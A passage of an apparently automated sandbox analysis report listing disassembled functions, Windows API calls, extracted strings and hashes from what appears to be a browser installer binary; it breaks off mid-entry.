                                                                                                                        • FormatMessageA.KERNEL32(00001AFF,00000000,00000000,00000000,?,00000100,00000000), ref: 0086C58C
                                                                                                                        • _strlen.LIBCMT ref: 0086C5CB
                                                                                                                        • _strlen.LIBCMT ref: 0086C77A
                                                                                                                        • GetLastError.KERNEL32 ref: 0086C8EF
                                                                                                                        • _strlen.LIBCMT ref: 0086C91E
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 0086CAC9
                                                                                                                        • winhttp.dll, xrefs: 0086C574
                                                                                                                        • (0x%lx), xrefs: 0086C5BA
                                                                                                                        • : error 0x%lx while retrieving error 0x%lx, xrefs: 0086C8F7
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 0086CA31
                                                                                                                        • ..\..\third_party\libc++\src\include\string:970: assertion __n == 0 || __s != nullptr failed: basic_string(const char*, n) detected nullptr, xrefs: 0086CAD0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen$ErrorLast$FormatHandleMessageModule
                                                                                                                        • String ID: (0x%lx)$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:970: assertion __n == 0 || __s != nullptr failed: basic_string(const char*, n) detected nullptr$: error 0x%lx while retrieving error 0x%lx$winhttp.dll
                                                                                                                        • API String ID: 122708064-2913225727
                                                                                                                        • Opcode ID: 9163afe7e75745ed21e99c94014c26e1a3c033bf64f467b054c064484012d679
                                                                                                                        • Instruction ID: f0ba3a18b20dc410e313f136d8b7d4fd7b1f461290b705269c700fa6f351db0b
                                                                                                                        • Opcode Fuzzy Hash: 9163afe7e75745ed21e99c94014c26e1a3c033bf64f467b054c064484012d679
                                                                                                                        • Instruction Fuzzy Hash: E4F10371E042295BEB21CB64CC91BFAB7B5FFA6304F1541E9E589A7241EB706EC08B50
                                                                                                                        Function 008AAAF0 Relevance: 20.0, APIs: 4, Strings: 7, Instructions: 789COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • SampleVector-max, xrefs: 008AB452
                                                                                                                        • SampleVector-range_max, xrefs: 008AB4D2
                                                                                                                        • SampleVector-min, xrefs: 008AB412
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008AB3EC
                                                                                                                        • SampleVector-range_min, xrefs: 008AB492
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008AACC8, 008AAEC7, 008AB176
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008AB3E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds$SampleVector-max$SampleVector-min$SampleVector-range_max$SampleVector-range_min
                                                                                                                        • API String ID: 0-79398655
                                                                                                                        • Opcode ID: 5bc2fd6bf827213765fb56c5908de7f0434153b416a4ef527be39e3c1ef6d15d
                                                                                                                        • Instruction ID: 518b165f25c9430a61a799365d801998ce754738e0b4dc0406687fecfa85be35
                                                                                                                        • Opcode Fuzzy Hash: 5bc2fd6bf827213765fb56c5908de7f0434153b416a4ef527be39e3c1ef6d15d
                                                                                                                        • Instruction Fuzzy Hash: 1752EF70A042059FDB18DF68C891A6EB7E1FF85714F04862DE946DBB92DB31EC05CB92
                                                                                                                        Function 008BA790 Relevance: 19.8, APIs: 5, Strings: 6, Instructions: 572COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • GetDiskFreeSpaceEx failed, xrefs: 008BAE49
                                                                                                                        • HasEnoughDiskSpace, xrefs: 008BADFF, 008BAE34, 008BAE5B
                                                                                                                        • There is not enough disk space to install browser, xrefs: 008BAE14
                                                                                                                        • .0.0, xrefs: 008BA7D2
                                                                                                                        • SHGetFolderPath failed, xrefs: 008BAE70
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008BAD4F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen$DiskFreeSpace
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$.0.0$GetDiskFreeSpaceEx failed$HasEnoughDiskSpace$SHGetFolderPath failed$There is not enough disk space to install browser
                                                                                                                        • API String ID: 1003944951-1564188721
                                                                                                                        • Opcode ID: c0e6e93073d7fd63393a7febb6cada7777f5a97215ab60bf2a3231191e6264c8
                                                                                                                        • Instruction ID: 0e6eb898c4306b49d0554e30dde0515be2bef4695bd7ef90241cc5f85c6b6105
                                                                                                                        • Opcode Fuzzy Hash: c0e6e93073d7fd63393a7febb6cada7777f5a97215ab60bf2a3231191e6264c8
                                                                                                                        • Instruction Fuzzy Hash: B7120371908341ABD714DF24C880BABBBE5FFD5714F14892CF895A7282E770AA49C793
                                                                                                                        Function 0089CE40 Relevance: 19.8, APIs: 6, Strings: 5, Instructions: 562processsynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetHandleInformation.KERNEL32(?,00000001,00000001,?,009659FC), ref: 0089D03E
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,?,?), ref: 0089D2F7
                                                                                                                        • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 0089D384
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?,?,?,?,009659FC), ref: 0089D3F2
                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0089D49F
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,009659FC), ref: 0089D4DA
                                                                                                                        Strings
                                                                                                                        • launch_win.cc, xrefs: 0089CF4C, 0089D3CF, 0089D507
                                                                                                                        • LaunchProcess, xrefs: 0089CF51, 0089D3D4, 0089D50C, 0089D572
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0089D4EC
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds, xrefs: 0089D4E5
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0089D4F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentObjectProcessStrings$AssignCreateFreeHandleInformationSingleWait
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds$LaunchProcess$launch_win.cc
                                                                                                                        • API String ID: 1486188796-4286880561
                                                                                                                        • Opcode ID: fb6543fc8de74490bd1faf6ae9a173104878ef438b57cf0fce6905c19e505b2c
                                                                                                                        • Instruction ID: 91b3d5a61ec84491685868d09b6ce087e5b46850922f4081719cca0ceeed73af
                                                                                                                        • Opcode Fuzzy Hash: fb6543fc8de74490bd1faf6ae9a173104878ef438b57cf0fce6905c19e505b2c
                                                                                                                        • Instruction Fuzzy Hash: 4B22C3716083819BDB10EF24C841BABB7E5FF89304F084A1DF989D7281EB70E945CB96
                                                                                                                        Function 008E0070 Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 603COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • launched, xrefs: 008E04E8, 008E050C
                                                                                                                        • launched, xrefs: 008E0738, 008E073D
                                                                                                                        • old_ver, xrefs: 008E07CE, 008E0833, 008E083A, 008E084B
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008E0317
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008E031E
                                                                                                                        • ui, xrefs: 008E0763
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$launched$launched$old_ver$ui
                                                                                                                        • API String ID: 0-478968565
                                                                                                                        • Opcode ID: 11396008089887a2ce6abbfe058618ec1e0509ae776e8b60011cc8945767af29
                                                                                                                        • Instruction ID: 2ad476890fb0456b0d68b52bd5bdefb4074164e2acdaf417791ce5d74ea741fe
                                                                                                                        • Opcode Fuzzy Hash: 11396008089887a2ce6abbfe058618ec1e0509ae776e8b60011cc8945767af29
                                                                                                                        • Instruction Fuzzy Hash: 4E32C071D002999FDF15CFA9C880AAEBBB5FF46314F148529E805F7241E7B0A985CFA1
                                                                                                                        Function 008CA000 Relevance: 12.6, APIs: 2, Strings: 4, Instructions: 2058COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008CB990
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008CB9D2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_header
                                                                                                                        • String ID: 0$1$?$@
                                                                                                                        • API String ID: 3738618077-2988480200
                                                                                                                        • Opcode ID: 5057cac69bc56d87585c705778b3ecee2aaf894f127344f9bb46fe74025c0c68
                                                                                                                        • Instruction ID: 5ea54e26629c7a8cd62ad31b9a5b92cf28b13347a51c2123f159c600048791b8
                                                                                                                        • Opcode Fuzzy Hash: 5057cac69bc56d87585c705778b3ecee2aaf894f127344f9bb46fe74025c0c68
                                                                                                                        • Instruction Fuzzy Hash: 90F2C1716086998FC728CE24C491B6EB7F2FB95358F28891DE4A6DB250D335EC45CB43
                                                                                                                        Function 008F4970 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 126COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000000,?,00000000,?,?,008F5E87,?,00000000,?,?,00000000,?,?,-00000100,-000000FF,?), ref: 008F4981
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000000,00000002,?,?,008E6A46,00000002,?,?,?), ref: 008F4A30
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000,?,008F5E87,?,00000000,?,?,00000000,?,?,-00000100,-000000FF,?,?,008F56C4,?), ref: 008F4A00
                                                                                                                          • Part of subcall function 008E6680: TryAcquireSRWLockExclusive.KERNEL32(00972AD0,00000000,00000000,00000000,00000000), ref: 008E669A
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000,?,008E6A46,00000002,?,?,?), ref: 008F4AAF
                                                                                                                        Strings
                                                                                                                        • bitset set argument out of range, xrefs: 008F4A0D
                                                                                                                        • bitset reset argument out of range, xrefs: 008F4ABB
                                                                                                                        • t1=, xrefs: 008F4A4A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Acquire$Release
                                                                                                                        • String ID: bitset reset argument out of range$bitset set argument out of range$t1=
                                                                                                                        • API String ID: 1678258262-157012313
                                                                                                                        • Opcode ID: 570f638a0199ced85597afa9c4dcdbdcb7b1dee70681ea34812216cfd7cd2a6c
                                                                                                                        • Instruction ID: d0f36e0c6f2a0cc3e039f2a553193ab9e5847d2da39ae14d33eafa1a0be19f7a
                                                                                                                        • Opcode Fuzzy Hash: 570f638a0199ced85597afa9c4dcdbdcb7b1dee70681ea34812216cfd7cd2a6c
                                                                                                                        • Instruction Fuzzy Hash: F2314B3335462C8BCB1C5E78AC4667F3716FBD23A5B14821AFA12C31A2D6B08C42C694
                                                                                                                        Function 008CE380 Relevance: 11.6, Strings: 9, Instructions: 337COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • base, xrefs: 008CE62E
                                                                                                                        • yatestscreen, xrefs: 008CE707
                                                                                                                        • chrome, xrefs: 008CE6E1
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008CE516
                                                                                                                        • test, xrefs: 008CE650, 008CE6F4
                                                                                                                        • gen, xrefs: 008CE5F2
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008CE51D
                                                                                                                        • CR_SOURCE_ROOT, xrefs: 008CE3D3
                                                                                                                        • data, xrefs: 008CE672
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$CR_SOURCE_ROOT$base$chrome$data$gen$test$yatestscreen
                                                                                                                        • API String ID: 0-1251466949
                                                                                                                        • Opcode ID: a1a41e2daa516ebea264ccec2cd62b478263e161db8a339c432cbf35318c3810
                                                                                                                        • Instruction ID: 8ca88fee3fe284b60874e3bda4f761b779620947188bc351a692ef0b4c1caa75
                                                                                                                        • Opcode Fuzzy Hash: a1a41e2daa516ebea264ccec2cd62b478263e161db8a339c432cbf35318c3810
                                                                                                                        • Instruction Fuzzy Hash: 2DA19670A002095BDF14AF699852FFF7B36FF85708F04442DF905E7382EA74AA05C6A2
                                                                                                                        Function 008D8AF0 Relevance: 11.1, APIs: 5, Strings: 1, Instructions: 581COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __floor_pentium4.LIBCMT ref: 008D8CA2
                                                                                                                        • __floor_pentium4.LIBCMT ref: 008D8DED
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 008D8ED8
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008D8FF8
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008D904D
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008D8E88
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Release__floor_pentium4$Acquire
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                                                                                        • API String ID: 2821508176-2888085009
                                                                                                                        • Opcode ID: 76c9b06a5447f2bda869bb63940f6de34cc8e03a39ec34cd228fc50ac13a95d3
                                                                                                                        • Instruction ID: 6e722b82ce9b3ef9ee300895470b8466203c4d3bc81b6d38ef060dc94d95d2f5
                                                                                                                        • Opcode Fuzzy Hash: 76c9b06a5447f2bda869bb63940f6de34cc8e03a39ec34cd228fc50ac13a95d3
                                                                                                                        • Instruction Fuzzy Hash: F412B371B1461ACFCB18CF69D88156EB7F2FF99310718862AE506EB351EB30ED418B91
                                                                                                                        Function 008E6B90 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 376COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008E6E39
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008E70AC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLockRelease
                                                                                                                        • String ID: first
                                                                                                                        • API String ID: 1766480654-2456940119
                                                                                                                        • Opcode ID: d730557c8644eeee16109a55f7616b03987a0788caa812098893bfe0c047b73d
                                                                                                                        • Instruction ID: 99f3ec014a5f69597452af6f5bfc69589a2bc901ed111b12dd62f3b77b561731
                                                                                                                        • Opcode Fuzzy Hash: d730557c8644eeee16109a55f7616b03987a0788caa812098893bfe0c047b73d
                                                                                                                        • Instruction Fuzzy Hash: 4AE1E1716087418FC718CF29C88476AB7E2FFD6358F19856CE8898B292E731EC55CB81
                                                                                                                        Function 0092AA7A Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
